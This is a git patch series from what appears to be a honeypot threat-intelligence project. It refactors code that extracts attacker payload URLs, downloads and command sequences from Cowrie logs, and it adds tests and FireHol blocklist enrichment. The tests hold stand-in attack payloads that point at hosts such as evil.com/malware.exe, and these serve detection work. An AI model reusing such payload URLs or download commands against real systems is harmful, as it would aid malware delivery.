 
-    def _extract_possible_payload_in_messages(self, scanner_ip: str, hits: list[dict]) -> None:
-        # looking for URLs inside attacks payloads
+    def _extract_possible_payload_in_messages(self, hits: list[dict]) -> None:
+        """
+        Extract URLs hidden in attack payloads (login messages, file uploads).
+        Processes all hits once for efficiency (O(M) instead of O(N*M)).
+
+        Args:
+            hits: List of hits to search for payloads
+        """
         for hit in hits:
-            if hit["src_ip"] != scanner_ip:
-                continue
-            if hit.get("eventid", "") not in ["cowrie.login.failed", "cowrie.session.file_upload"]:
+            if hit.get("eventid", "") not in [
+                "cowrie.login.failed",
+                "cowrie.session.file_upload",
+            ]:
                 continue
+
             match_url = re.search(REGEX_URL_PROTOCOL, hit.get("message", ""))
-            if match_url:
-                payload_url = match_url.group()
-                self.log.info(f"found hidden URL {payload_url} in payload from attacker {scanner_ip}")
-                payload_hostname = urlparse(payload_url).hostname
-                self.log.info(f"extracted hostname {payload_hostname} from {payload_url}")
-                ioc = IOC(
-                    name=payload_hostname,
-                    type=get_ioc_type(payload_hostname),
-                    cowrie=True,
-                    related_urls=[payload_url],
-                )
-                self.ioc_processor.add_ioc(ioc, attack_type=PAYLOAD_REQUEST)
-                self._add_fks(scanner_ip, payload_hostname)
-                self.payloads_in_message += 1
+            if not match_url:
+                continue
+
+            scanner_ip = hit["src_ip"]
+            payload_url = match_url.group()
+            payload_hostname = parse_url_hostname(payload_url)
+
+            if not payload_hostname:
+                self.log.warning(f"Failed to parse hostname from URL: {payload_url}")
+                continue
+
+            self.log.info(f"found hidden URL {payload_url} in payload from attacker {scanner_ip}")
+            self.log.info(f"extracted hostname {payload_hostname} from {payload_url}")
+
+            ioc = IOC(
+                name=payload_hostname,
+                type=get_ioc_type(payload_hostname),
+                cowrie=True,
+                related_urls=[payload_url],
+            )
+            self.ioc_processor.add_ioc(ioc, attack_type=PAYLOAD_REQUEST)
+            self._add_fks(scanner_ip, payload_hostname)
+            self.payloads_in_message += 1
 
     def _get_url_downloads(self, hits: list[dict]) -> None:
+        """
+        Extract file download attempts and associate scanners with download URLs.
+
+        Args:
+            hits: List of hits to search for download events
+        """
         for hit in hits:
             if "url" not in hit:
                 continue
             if hit.get("eventid", "") != "cowrie.session.file_download":
                 continue
-            self.log.info(f"found IP {hit['src_ip']} trying to execute download from {hit['url']}")
+
             scanner_ip = str(hit["src_ip"])
-            ioc = IOC(name=scanner_ip, type=get_ioc_type(scanner_ip), cowrie=True)
-            ioc_record = self.ioc_processor.add_ioc(ioc, attack_type=SCANNER)
-            if ioc_record:
-                self.added_ip_downloads += 1
-                threatfox_submission(ioc_record, ioc.related_urls, self.log)
             download_url = str(hit["url"])
+
+            self.log.info(f"found IP {scanner_ip} downloading from {download_url}")
+
+            # Extract and track download URL
             if download_url:
-                hostname = urlparse(download_url).hostname
+                hostname = parse_url_hostname(download_url)
+                if not hostname:
+                    self.log.warning(f"Failed to parse hostname from download URL: {download_url}")
+                    continue
+
                 ioc = IOC(
                     name=hostname,
                     type=get_ioc_type(hostname),
@@ -107,6 +184,13 @@ def _get_url_downloads(self, hits: list[dict]) -> None:
                 self._add_fks(scanner_ip, hostname)
 
     def _get_sessions(self, ioc: IOC, hits: list[dict]) -> None:
+        """
+        Extract and save session data for a given scanner IOC.
+
+        Args:
+            ioc: Scanner IOC object
+            hits: List of hits to process
+        """
         self.log.info(f"adding cowrie sessions from {ioc.name}")
         hits_per_session = defaultdict(list)
 
@@ -115,81 +199,105 @@ def _get_sessions(self, ioc: IOC, hits: list[dict]) -> None:
                 continue
             hits_per_session[hit["session"]].append(hit)
 
-        for sid, hits in hits_per_session.items():
+        for sid, session_hits in hits_per_session.items():
             session_record = self.session_repo.get_or_create_session(session_id=sid, source=ioc)
-            for hit in sorted(hits, key=lambda hit: hit["timestamp"]):
-                match hit["eventid"]:
-                    case "cowrie.session.connect":
-                        session_record.start_time = hit["timestamp"]
-                    case "cowrie.login.failed" | "cowrie.login.success":
-                        session_record.login_attempt = True
-                        username = hit["username"].replace("\x00", "[NUL]")
-                        password = hit["password"].replace("\x00", "[NUL]")
-                        session_record.credentials.append(f"{username} | {password}")
-                        session_record.source.login_attempts += 1
-                    case "cowrie.command.input":
-                        self.log.info(f"found a command execution from {ioc.name}")
-                        session_record.command_execution = True
-                        if session_record.commands is None:
-                            session_record.commands = CommandSequence()
-                            session_record.commands.first_seen = hit["timestamp"]
-                        command = hit["message"].removeprefix("CMD: ").replace("\x00", "[NUL]")
-                        session_record.commands.last_seen = hit["timestamp"]
-                        session_record.commands.commands.append(command[:1024])
-                    case "cowrie.session.closed":
-                        session_record.duration = hit["duration"]
-                session_record.interaction_count += 1
+
+            for hit in sorted(session_hits, key=lambda hit: hit["timestamp"]):
+                self._process_session_hit(session_record, hit, ioc)
+
             if session_record.commands is not None:
-                # moved this check at the end to avoid forgetting about this...
-                # ...if the "closed" record is not available
                 self._deduplicate_command_sequence(session_record)
                 self.session_repo.save_command_sequence(session_record.commands)
                 self.log.info(f"saved new command execute from {ioc.name} " f"with hash {session_record.commands.commands_hash}")
+
             self.ioc_repo.save(session_record.source)
             self.session_repo.save_session(session_record)
 
         self.log.info(f"{len(hits_per_session)} sessions added")
 
-    def _add_fks(self, scanner_ip, hostname):
-        self.log.info(f"adding foreign keys for the following iocs: {scanner_ip}, {hostname}")
+    def _process_session_hit(self, session_record: CowrieSession, hit: dict, ioc: IOC) -> None:
+        """
+        Process a single hit and update the session record.
+
+        Args:
+            session_record: CowrieSession instance to update
+            hit: Hit document to process
+            ioc: Associated IOC for logging
+        """
+        eventid = hit.get("eventid")
+
+        match eventid:
+            case "cowrie.session.connect":
+                session_record.start_time = hit["timestamp"]
+
+            case "cowrie.login.failed" | "cowrie.login.success":
+                session_record.login_attempt = True
+                username = normalize_credential_field(hit["username"])
+                password = normalize_credential_field(hit["password"])
+                session_record.credentials.append(f"{username} | {password}")
+                session_record.source.login_attempts += 1
+
+            case "cowrie.command.input":
+                self.log.info(f"found a command execution from {ioc.name}")
+                session_record.command_execution = True
+
+                if session_record.commands is None:
+                    session_record.commands = CommandSequence()
+                    session_record.commands.first_seen = hit["timestamp"]
+
+                command = normalize_command(hit["message"])
+                session_record.commands.last_seen = hit["timestamp"]
+                session_record.commands.commands.append(command)
+
+            case "cowrie.session.closed":
+                session_record.duration = hit["duration"]
+
+        session_record.interaction_count += 1
+
+    def _add_fks(self, scanner_ip: str, hostname: str) -> None:
+        """
+        Link related IOCs bidirectionally (scanner IP <-> hostname).
+
+        Args:
+            scanner_ip: Scanner IP address
+            hostname: Hostname to link with scanner
+        """
         scanner_ip_instance = self.ioc_repo.get_ioc_by_name(scanner_ip)
         hostname_instance = self.ioc_repo.get_ioc_by_name(hostname)
 
-        if scanner_ip_instance is not None:
-            if hostname_instance and hostname_instance not in scanner_ip_instance.related_ioc.all():
-                scanner_ip_instance.related_ioc.add(hostname_instance)
-            self.ioc_repo.save(scanner_ip_instance)
+        # Log warning if IOCs are missing - shouldn't happen in normal operation
+        if not scanner_ip_instance or not hostname_instance:
+            self.log.warning(
+                f"Cannot link IOCs - missing from database: " f"scanner_ip={scanner_ip_instance is not None}, " f"hostname={hostname_instance is not None}"
+            )
+            return
+
+        # Link bidirectionally - Django's .add() handles deduplication automatically
+        scanner_ip_instance.related_ioc.add(hostname_instance)
+        self.ioc_repo.save(scanner_ip_instance)
 
-        if hostname_instance is not None:
-            if scanner_ip_instance and scanner_ip_instance not in hostname_instance.related_ioc.all():
-                hostname_instance.related_ioc.add(scanner_ip_instance)
-            self.ioc_repo.save(hostname_instance)
+        hostname_instance.related_ioc.add(scanner_ip_instance)
+        self.ioc_repo.save(hostname_instance)
 
     def _deduplicate_command_sequence(self, session: CowrieSession) -> bool:
         """
-        Deduplicates command sequences by hashing and either linking to an existing
-        sequence or preparing for creation of a new one.
+        Deduplicate command sequences by hashing and merging with existing sequences.
 
         Args:
-            session: A CowrieSession instance containing command sequence data
+            session: CowrieSession instance containing command sequence data
 
         Returns:
-            bool: True if merged with existing sequence, else False
+            True if merged with existing sequence, False if new sequence
         """
         commands_str = "\n".join(session.commands.commands)
         commands_hash = sha256(commands_str.encode()).hexdigest()
-        # Check if the recorded sequence already exists
+
         cmd_seq = self.session_repo.get_command_sequence_by_hash(commands_hash=commands_hash)
         if cmd_seq is None:
-            # In case sequence does not exist:
-            # Assign hash to the the sequence
             session.commands.commands_hash = commands_hash
             return False
-        # In case sequence does already exist:
-        # Delete newly created sequence from DB
-        # and assign existing sequence to session
+
         last_seen = session.commands.last_seen
         session.commands = cmd_seq
-        # updated the last seen
         session.commands.last_seen = last_seen
         return True
diff --git a/greedybear/regex.py b/greedybear/regex.py
index 77fc9c2d..57e0a269 100644
--- a/greedybear/regex.py
+++ b/greedybear/regex.py
@@ -3,4 +3,4 @@
 REGEX_CVE_URL = r"//[a-zA-Z\d_-]{1,200}(?:\.[a-zA-Z\d_-]{1,200})+(?::\d{2,6})?(?:/[a-zA-Z\d_=-]{1,200})*(?:\.\w+)?"
 REGEX_CVE_BASE64COMMAND = r"/Command/Base64/((?:[a-zA-Z\+\/\d]+)(?:={0,3}))}"
 REGEX_URL = REGEX_CVE_URL[2:]
-REGEX_URL_PROTOCOL = r"(?:htt|ft|tc|lda)ps?" + REGEX_CVE_URL
+REGEX_URL_PROTOCOL = r"(?:htt|ft|tc|lda)ps?:?" + REGEX_CVE_URL
diff --git a/tests/greedybear/__init__.py b/tests/greedybear/__init__.py
new file mode 100644
index 00000000..a14b216c
--- /dev/null
+++ b/tests/greedybear/__init__.py
@@ -0,0 +1 @@
+# This file makes the directory a Python package for test discovery
diff --git a/tests/greedybear/cronjobs/__init__.py b/tests/greedybear/cronjobs/__init__.py
new file mode 100644
index 00000000..a14b216c
--- /dev/null
+++ b/tests/greedybear/cronjobs/__init__.py
@@ -0,0 +1 @@
+# This file makes the directory a Python package for test discovery
diff --git a/tests/test_cowrie_extraction.py b/tests/test_cowrie_extraction.py
new file mode 100644
index 00000000..6144dc5b
--- /dev/null
+++ b/tests/test_cowrie_extraction.py
@@ -0,0 +1,343 @@
+"""
+Tests for Cowrie extraction helper functions and strategy.
+"""
+
+from unittest import TestCase
+from unittest.mock import MagicMock, Mock, patch
+
+from greedybear.cronjobs.extraction.strategies.cowrie import CowrieExtractionStrategy, normalize_command, normalize_credential_field, parse_url_hostname
+from greedybear.models import CommandSequence
+
+
+class TestHelperFunctions(TestCase):
+    """Test standalone helper functions."""
+
+    def test_parse_url_hostname_valid_http(self):
+        """Test URL parsing with valid HTTP URL."""
+        result = parse_url_hostname("http://example.com/path")
+        self.assertEqual(result, "example.com")
+
+    def test_parse_url_hostname_valid_https(self):
+        """Test URL parsing with valid HTTPS URL."""
+        result = parse_url_hostname("https://malware.site/payload.exe")
+        self.assertEqual(result, "malware.site")
+
+    def test_parse_url_hostname_with_port(self):
+        """Test URL parsing with port number."""
+        result = parse_url_hostname("http://evil.com:8080/download")
+        self.assertEqual(result, "evil.com")
+
+    def test_parse_url_hostname_invalid_url(self):
+        """Test URL parsing with invalid URL."""
+        result = parse_url_hostname("not_a_url")
+        self.assertIsNone(result)
+
+    def test_parse_url_hostname_empty_string(self):
+        """Test URL parsing with empty string."""
+        result = parse_url_hostname("")
+        self.assertIsNone(result)
+
+    def test_normalize_command_with_prefix(self):
+        """Test command normalization with CMD prefix."""
+        result = normalize_command("CMD: ls -la")
+        self.assertEqual(result, "ls -la")
+
+    def test_normalize_command_without_prefix(self):
+        """Test command normalization without prefix."""
+        result = normalize_command("pwd")
+        self.assertEqual(result, "pwd")
+
+    def test_normalize_command_with_null_chars(self):
+        """Test command normalization with null characters."""
+        result = normalize_command("CMD: echo\x00test")
+        self.assertEqual(result, "echo[NUL]test")
+
+    def test_normalize_command_truncation(self):
+        """Test command truncation to 1024 characters."""
+        long_command = "CMD: " + "A" * 2000
+        result = normalize_command(long_command)
+        self.assertEqual(len(result), 1024)
+        self.assertTrue(result.startswith("A"))
+
+    def test_normalize_credential_field_with_null(self):
+        """Test credential normalization with null characters."""
+        result = normalize_credential_field("user\x00name")
+        self.assertEqual(result, "user[NUL]name")
+
+    def test_normalize_credential_field_clean(self):
+        """Test credential normalization with clean string."""
+        result = normalize_credential_field("admin")
+        self.assertEqual(result, "admin")
+
+
+class TestCowrieExtractionStrategy(TestCase):
+    """Test CowrieExtractionStrategy class."""
+
+    def setUp(self):
+        """Set up test fixtures."""
+        self.mock_ioc_repo = Mock()
+        self.mock_sensor_repo = Mock()
+        self.mock_session_repo = Mock()
+
+        self.strategy = CowrieExtractionStrategy(
+            "Cowrie",
+            self.mock_ioc_repo,
+            self.mock_sensor_repo,
+            self.mock_session_repo,
+        )
+        self.strategy.ioc_processor = Mock()
+
+    def test_extract_payload_in_messages_with_url(self):
+        """Test extraction of URLs from login failure messages."""
+        hits = [
+            {
+                "src_ip": "1.2.3.4",
+                "eventid": "cowrie.login.failed",
+                "message": "Failed login with http://evil.com/malware.exe",
+            }
+        ]
+
+        scanner_mock = Mock()
+        scanner_mock.related_ioc.all.return_value = []
+        payload_mock = Mock()
+        payload_mock.related_ioc.all.return_value = []
+
+        self.mock_ioc_repo.get_ioc_by_name.side_effect = [scanner_mock, payload_mock]
+
+        self.strategy._extract_possible_payload_in_messages(hits)
+
+        # Should have called add_ioc for the payload
+        self.assertEqual(self.strategy.ioc_processor.add_ioc.call_count, 1)
+        call_args = self.strategy.ioc_processor.add_ioc.call_args
+        ioc_arg = call_args[0][0]
+
+        self.assertEqual(ioc_arg.name, "evil.com")
+        self.assertTrue(ioc_arg.cowrie)
+        self.assertIn("http://evil.com/malware.exe", ioc_arg.related_urls)
+
+    def test_extract_payload_in_messages_no_url(self):
+        """Test extraction when message has no URL."""
+        hits = [
+            {
+                "src_ip": "1.2.3.4",
+                "eventid": "cowrie.login.failed",
+                "message": "Failed login attempt",
+            }
+        ]
+
+        self.strategy._extract_possible_payload_in_messages(hits)
+
+        # Should not add any IOC
+        self.strategy.ioc_processor.add_ioc.assert_not_called()
+
+    def test_extract_payload_different_ips(self):
+        """Test that payloads from different IPs are all processed."""
+        hits = [
+            {
+                "src_ip": "5.6.7.8",
+                "eventid": "cowrie.login.failed",
+                "message": "http://evil.com/malware",
+            }
+        ]
+
+        scanner_mock = Mock()
+        payload_mock = Mock()
+        self.mock_ioc_repo.get_ioc_by_name.side_effect = [scanner_mock, payload_mock]
+
+        self.strategy._extract_possible_payload_in_messages(hits)
+
+        # Should process the payload from any IP
+        self.strategy.ioc_processor.add_ioc.assert_called_once()
+
+    def test_extract_payload_in_messages_empty_hits(self):
+        """Test extraction with empty hits list."""
+        hits = []
+
+        self.strategy._extract_possible_payload_in_messages(hits)
+
+        # Should not call add_ioc when there are no hits
+        self.strategy.ioc_processor.add_ioc.assert_not_called()
+
+    def test_get_url_downloads(self):
+        """Test extraction of file download attempts."""
+        hits = [
+            {
+                "src_ip": "1.2.3.4",
+                "eventid": "cowrie.session.file_download",
+                "url": "http://malware.com/bad.exe",
+            }
+        ]
+
+        scanner_mock = Mock()
+        payload_mock = Mock()
+
+        self.mock_ioc_repo.get_ioc_by_name.side_effect = [scanner_mock, payload_mock]
+        mock_payload_record = Mock()
+        self.strategy.ioc_processor.add_ioc.return_value = mock_payload_record
+
+        self.strategy._get_url_downloads(hits)
+
+        # Should only create 1 IOC: payload hostname (scanner already added in _get_scanners)
+        self.assertEqual(self.strategy.ioc_processor.add_ioc.call_count, 1)
+        self.assertEqual(self.strategy.added_url_downloads, 1)
+
+    def test_get_url_downloads_invalid_url(self):
+        """Test download extraction with invalid URL."""
+        hits = [
+            {
+                "src_ip": "1.2.3.4",
+                "eventid": "cowrie.session.file_download",
+                "url": "not_a_valid_url",
+            }
+        ]
+
+        self.strategy.ioc_processor.add_ioc.return_value = Mock()
+
+        self.strategy._get_url_downloads(hits)
+
+        # Should not create any IOC (invalid URL, and scanner already added in _get_scanners)
+        self.strategy.ioc_processor.add_ioc.assert_not_called()
+
+    def test_process_session_hit_connect(self):
+        """Test processing of session connect event."""
+        session_record = Mock()
+        session_record.interaction_count = 0
+        hit = {
+            "eventid": "cowrie.session.connect",
+            "timestamp": "2023-01-01T10:00:00",
+        }
+        ioc = Mock(name="1.2.3.4")
+
+        self.strategy._process_session_hit(session_record, hit, ioc)
+
+        self.assertEqual(session_record.start_time, "2023-01-01T10:00:00")
+        self.assertEqual(session_record.interaction_count, 1)
+
+    def test_process_session_hit_login_failed(self):
+        """Test processing of login failure event."""
+        session_record = Mock()
+        session_record.credentials = []
+        session_record.source = Mock(login_attempts=0)
+        session_record.interaction_count = 0
+
+        hit = {
+            "eventid": "cowrie.login.failed",
+            "timestamp": "2023-01-01T10:00:01",
+            "username": "root",
+            "password": "password123",
+        }
+        ioc = Mock(name="1.2.3.4")
+
+        self.strategy._process_session_hit(session_record, hit, ioc)
+
+        self.assertTrue(session_record.login_attempt)
+        self.assertIn("root | password123", session_record.credentials)
+        self.assertEqual(session_record.source.login_attempts, 1)
+
+    def test_process_session_hit_command_input(self):
+        """Test processing of command input event."""
+        session_record = Mock()
+        session_record.commands = None
+        session_record.interaction_count = 0
+
+        hit = {
+            "eventid": "cowrie.command.input",
+            "timestamp": "2023-01-01T10:00:05",
+            "message": "CMD: ls -la",
+        }
+        ioc = Mock(name="1.2.3.4")
+
+        self.strategy._process_session_hit(session_record, hit, ioc)
+
+        self.assertTrue(session_record.command_execution)
+        self.assertIsInstance(session_record.commands, CommandSequence)
+        self.assertEqual(session_record.commands.first_seen, "2023-01-01T10:00:05")
+        self.assertIn("ls -la", session_record.commands.commands)
+
+    def test_process_session_hit_session_closed(self):
+        """Test processing of session closed event."""
+        session_record = Mock()
+        session_record.interaction_count = 0
+        hit = {
+            "eventid": "cowrie.session.closed",
+            "timestamp": "2023-01-01T10:00:10",
+            "duration": 10.5,
+        }
+        ioc = Mock(name="1.2.3.4")
+
+        self.strategy._process_session_hit(session_record, hit, ioc)
+
+        self.assertEqual(session_record.duration, 10.5)
+
+    def test_add_fks_both_exist(self):
+        """Test linking IOCs when both exist."""
+        scanner_mock = MagicMock()
+        hostname_mock = MagicMock()
+
+        self.mock_ioc_repo.get_ioc_by_name.side_effect = [scanner_mock, hostname_mock]
+
+        self.strategy._add_fks("1.2.3.4", "evil.com")
+
+        scanner_mock.related_ioc.add.assert_called_once_with(hostname_mock)
+        hostname_mock.related_ioc.add.assert_called_once_with(scanner_mock)
+        self.assertEqual(self.mock_ioc_repo.save.call_count, 2)
+
+    def test_add_fks_scanner_none(self):
+        """Test linking when scanner IOC doesn't exist."""
+        hostname_mock = MagicMock()
+
+        self.mock_ioc_repo.get_ioc_by_name.side_effect = [None, hostname_mock]
+
+        self.strategy._add_fks("1.2.3.4", "evil.com")
+
+        # Should not save anything (early return when either is None)
+        self.mock_ioc_repo.save.assert_not_called()
+
+    def test_deduplicate_command_sequence_new(self):
+        """Test command sequence deduplication for new sequence."""
+        session = Mock()
+        session.commands = Mock()
+        session.commands.commands = ["ls", "pwd", "whoami"]
+
+        self.mock_session_repo.get_command_sequence_by_hash.return_value = None
+
+        result = self.strategy._deduplicate_command_sequence(session)
+
+        self.assertFalse(result)
+        self.assertIsNotNone(session.commands.commands_hash)
+
+    def test_deduplicate_command_sequence_existing(self):
+        """Test command sequence deduplication for existing sequence."""
+        session = Mock()
+        session.commands = Mock()
+        session.commands.commands = ["ls", "pwd", "whoami"]
+        session.commands.last_seen = "2023-01-01T10:00:10"
+
+        existing_cmd_seq = Mock()
+        self.mock_session_repo.get_command_sequence_by_hash.return_value = existing_cmd_seq
+
+        result = self.strategy._deduplicate_command_sequence(session)
+
+        self.assertTrue(result)
+        self.assertEqual(session.commands, existing_cmd_seq)
+        self.assertEqual(session.commands.last_seen, "2023-01-01T10:00:10")
+
+    @patch("greedybear.cronjobs.extraction.strategies.cowrie.iocs_from_hits")
+    def test_extract_from_hits_integration(self, mock_iocs_from_hits):
+        """Test the main extract_from_hits coordination."""
+        mock_ioc = Mock(name="1.2.3.4")
+        mock_ioc.cowrie = False
+        mock_iocs_from_hits.return_value = [mock_ioc]
+
+        mock_ioc_record = Mock()
+        self.strategy.ioc_processor.add_ioc.return_value = mock_ioc_record
+
+        hits = [{"src_ip": "1.2.3.4", "session": "s1", "eventid": "cowrie.session.connect"}]
+
+        with patch.object(self.strategy, "_get_sessions"):
+            with patch.object(self.strategy, "_extract_possible_payload_in_messages"):
+                self.strategy.extract_from_hits(hits)
+
+        # Verify scanner was processed
+        self.assertTrue(mock_ioc.cowrie)
+        self.strategy.ioc_processor.add_ioc.assert_called()

From 7aa6813e17bab544a20beb701eb4a68dcf7ed64e Mon Sep 17 00:00:00 2001
From: Drona Raj Gyawali <dronarajgyawali@gmail.com>
Date: Tue, 30 Dec 2025 12:19:34 +0545
Subject: [PATCH 16/75] test(repository): add tests for uncovered repository
 methods (#656)

Closes #652
---
 tests/test_repositories.py | 68 ++++++++++++++++++++++++++++++++++++++
 1 file changed, 68 insertions(+)

diff --git a/tests/test_repositories.py b/tests/test_repositories.py
index f39e38a2..e1ed30bf 100644
--- a/tests/test_repositories.py
+++ b/tests/test_repositories.py
@@ -46,6 +46,26 @@ def test_create_honeypot(self):
         hp = GeneralHoneypot.objects.get(name="NewHoneypot")
         self.assertTrue(hp.active)
 
+    def test_get_active_honeypots_returns_only_active(self):
+        GeneralHoneypot.objects.create(name="TestActivePot1", active=True)
+        GeneralHoneypot.objects.create(name="TestActivePot2", active=True)
+        GeneralHoneypot.objects.create(name="TestInactivePot", active=False)
+
+        result = self.repo.get_active_honeypots()
+        names = [hp.name for hp in result]
+
+        self.assertIn("TestActivePot1", names)
+        self.assertIn("TestActivePot2", names)
+        self.assertNotIn("TestInactivePot", names)
+
+    def test_get_active_honeypots_returns_empty_if_none_active(self):
+        GeneralHoneypot.objects.update(active=False)
+
+        result = self.repo.get_active_honeypots()
+        self.assertEqual(len(result), 0)
+
+        GeneralHoneypot.objects.update(active=True)
+
     def test_get_hp_by_name_returns_existing(self):
         GeneralHoneypot.objects.create(name="TestPot", active=True)
         result = self.repo.get_hp_by_name("TestPot")
@@ -269,6 +289,39 @@ def setUp(self):
 
         self.repo = ElasticRepository()
 
+    @patch("greedybear.cronjobs.repositories.elastic.Search")
+    def test_has_honeypot_been_hit_returns_true_when_hits_exist(self, mock_search_class):
+        mock_search = Mock()
+        mock_search_class.return_value = mock_search
+        mock_q = Mock()
+        with patch.object(self.repo, "_standard_query", return_value=mock_q):
+            mock_search.query.return_value = mock_search
+            mock_search.filter.return_value = mock_search
+            mock_search.count.return_value = 1
+
+            result = self.repo.has_honeypot_been_hit(minutes_back_to_lookup=10, honeypot_name="test_honeypot")
+            self.assertTrue(result)
+            mock_search.query.assert_called_once_with(mock_q)
+            mock_search.filter.assert_called_once_with("term", **{"type.keyword": "test_honeypot"})
+            mock_search.count.assert_called_once()
+
+    @patch("greedybear.cronjobs.repositories.elastic.Search")
+    def test_has_honeypot_been_hit_returns_false_when_no_hits(self, mock_search_class):
+        mock_search = Mock()
+        mock_search_class.return_value = mock_search
+        mock_q = Mock()
+        with patch.object(self.repo, "_standard_query", return_value=mock_q):
+            mock_search.query.return_value = mock_search
+            mock_search.filter.return_value = mock_search
+            mock_search.count.return_value = 0
+
+            result = self.repo.has_honeypot_been_hit(minutes_back_to_lookup=10, honeypot_name="test_honeypot")
+
+            self.assertFalse(result)
+            mock_search.query.assert_called_once_with(mock_q)
+            mock_search.filter.assert_called_once_with("term", **{"type.keyword": "test_honeypot"})
+            mock_search.count.assert_called_once()
+
     def test_healthcheck_passes_when_ping_succeeds(self):
         self.mock_client.ping.return_value = True
         self.repo._healthcheck()
@@ -344,6 +397,21 @@ def test_search_non_legacy_uses_time_window(self, mock_get_time_window, mock_sea
 
         mock_get_time_window.assert_called_once()
 
+    @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
+    @patch("greedybear.cronjobs.repositories.elastic.datetime")
+    def test_standard_query_returns_correct_query(self, mock_datetime, mock_get_time_window):
+        now = datetime(2023, 1, 1, 0, 0, 0)
+        mock_datetime.now.return_value = now
+        window_start = "2022-12-31T23:50:00"
+        window_end = "2023-01-01T00:00:00"
+        mock_get_time_window.return_value = (window_start, window_end)
+
+        q = self.repo._standard_query(minutes_back_to_lookup=10)
+
+        expected_dict = {"range": {"@timestamp": {"gte": window_start, "lt": window_end}}}
+        self.assertEqual(q.to_dict(), expected_dict)
+        mock_get_time_window.assert_called_once_with(now, 10)
+
 
 class TestTimeWindowCalculation(CustomTestCase):
     def test_basic_10min_window(self):

From d7e84e3a4f8b683b7cc49591e359261ca416362a Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Tue, 30 Dec 2025 22:21:38 +0530
Subject: [PATCH 17/75] Add auto extraction of FireHol lists. Closes #548
 (#642)

* feat: add auto extraction of FireHol lists for classification purposes

* feat: integrate FireHol lists with API and admin

- Add Celery beat schedule for weekly FireHol extraction
- Register FireHolList model in Django admin
- Expose firehol_categories field in Feeds API responses
- Add firehol_categories to IOC admin list display
- Improve error handling with specific exception types
- Simplify verbose comments in firehol.py
- Merge conflicting migrations from develop branch
- Update serializer tests for new firehol_categories field

All 267 tests passing

* refactor: address code review feedback

- Extract base_path variable for FireHol URLs
- Narrow RequestException scope to only wrap network call
- Use raise_for_status() for cleaner HTTP error handling
- Only enrich recently added IOCs (within 24h) instead of all existing ones
- Add cleanup routine to delete FireHolList entries older than 30 days
- Update tests to match new enrichment behavior

All 267 tests passing

* Move FireHol enrichment to IOC creation and add CIDR support

- Move FireHol category enrichment from separate job step to iocs_from_hits()
  where IOCs are created, ensuring only fresh data is applied at extraction time
- Add support for CIDR network ranges (netsets) using ipaddress library
- Remove _enrich_recent_iocs() method as enrichment now happens at IOC creation
- Update enrichment logic to handle both exact IP matches (.ipset) and
  network range membership (.netset) for proper dshield.netset support
- Update test to reflect new behavior where FireHolCron only downloads data,
  enrichment happens automatically during IOC creation

* Add comprehensive tests for FireHol enrichment in iocs_from_hits

- Test exact IP match enrichment (for .ipset files)
- Test CIDR network range match enrichment (for .netset files)
- Test no match scenario returns empty categories
- Test mixed exact and network range matches
- Test deduplication of FireHol sources

* Refactor: Extract FireHol enrichment logic into separate function

- Move FireHol category lookup logic to dedicated get_firehol_categories() function
- Simplify iocs_from_hits() to single-line call as requested
- Improves code readability and reduces function complexity

* Fix migration conflicts: Renumber to 0024 and 0025

- Renamed 0023_ioc_firehol_categories to 0024 (after upstream 0023_rename_massscanners)
- Renamed 0024_merge to 0025
- Updated dependencies to point to correct parent migrations
- All tests passing (277/277)
---
 api/serializers.py                            |  1 +
 api/views/utils.py                            |  1 +
 greedybear/admin.py                           | 41 +++++++++++--
 greedybear/celery.py                          |  5 ++
 greedybear/cronjobs/extraction/utils.py       | 43 ++++++++++++-
 greedybear/cronjobs/firehol.py                | 56 +++++++++++++++++
 ...tegories_alter_statistics_view_and_more.py | 46 ++++++++++++++
 .../migrations/0025_merge_20251223_2100.py    | 13 ++++
 greedybear/models.py                          | 12 ++++
 greedybear/tasks.py                           |  7 +++
 tests/greedybear/cronjobs/test_firehol.py     | 59 ++++++++++++++++++
 tests/test_extraction_utils.py                | 60 ++++++++++++++++++-
 tests/test_serializers.py                     |  1 +
 13 files changed, 338 insertions(+), 7 deletions(-)
 create mode 100644 greedybear/cronjobs/firehol.py
 create mode 100644 greedybear/migrations/0024_ioc_firehol_categories_alter_statistics_view_and_more.py
 create mode 100644 greedybear/migrations/0025_merge_20251223_2100.py
 create mode 100644 tests/greedybear/cronjobs/test_firehol.py

diff --git a/api/serializers.py b/api/serializers.py
index 8be204e7..dffa2a1a 100644
--- a/api/serializers.py
+++ b/api/serializers.py
@@ -127,6 +127,7 @@ class FeedsResponseSerializer(serializers.Serializer):
     attack_count = serializers.IntegerField(min_value=1)
     interaction_count = serializers.IntegerField(min_value=1)
     ip_reputation = serializers.CharField(allow_blank=True, max_length=32)
+    firehol_categories = serializers.ListField(child=serializers.CharField(max_length=64), allow_empty=True)
     asn = serializers.IntegerField(allow_null=True, min_value=1)
     destination_port_count = serializers.IntegerField(min_value=0)
     login_attempts = serializers.IntegerField(min_value=0)
diff --git a/api/views/utils.py b/api/views/utils.py
index 6f1325d2..d6a15985 100644
--- a/api/views/utils.py
+++ b/api/views/utils.py
@@ -240,6 +240,7 @@ def feeds_response(iocs, feed_params, valid_feed_types, dict_only=False, verbose
                 "scanner",
                 "payload_request",
                 "ip_reputation",
+                "firehol_categories",
                 "asn",
                 "destination_ports",
                 "login_attempts",
diff --git a/greedybear/admin.py b/greedybear/admin.py
index 5b04fab8..763c6db1 100644
--- a/greedybear/admin.py
+++ b/greedybear/admin.py
@@ -5,7 +5,7 @@
 from django.contrib import admin, messages
 from django.db.models import Q
 from django.utils.translation import ngettext
-from greedybear.models import IOC, CommandSequence, CowrieSession, GeneralHoneypot, MassScanner, Sensor, Statistics, WhatsMyIPDomain
+from greedybear.models import IOC, CommandSequence, CowrieSession, FireHolList, GeneralHoneypot, MassScanner, Sensor, Statistics, WhatsMyIPDomain
 
 logger = logging.getLogger(__name__)
 
@@ -38,9 +38,24 @@ class MassScannersModelAdmin(admin.ModelAdmin):
     search_help_text = ["search for the IP address source"]
 
 
+@admin.register(FireHolList)
+class FireHolListModelAdmin(admin.ModelAdmin):
+    list_display = ["ip_address", "added", "source"]
+    list_filter = ["source"]
+    search_fields = ["ip_address"]
+    search_help_text = ["search for the IP address"]
+
+
 class SessionInline(admin.TabularInline):
     model = CowrieSession
-    fields = ["source", "start_time", "duration", "credentials", "interaction_count", "commands"]
+    fields = [
+        "source",
+        "start_time",
+        "duration",
+        "credentials",
+        "interaction_count",
+        "commands",
+    ]
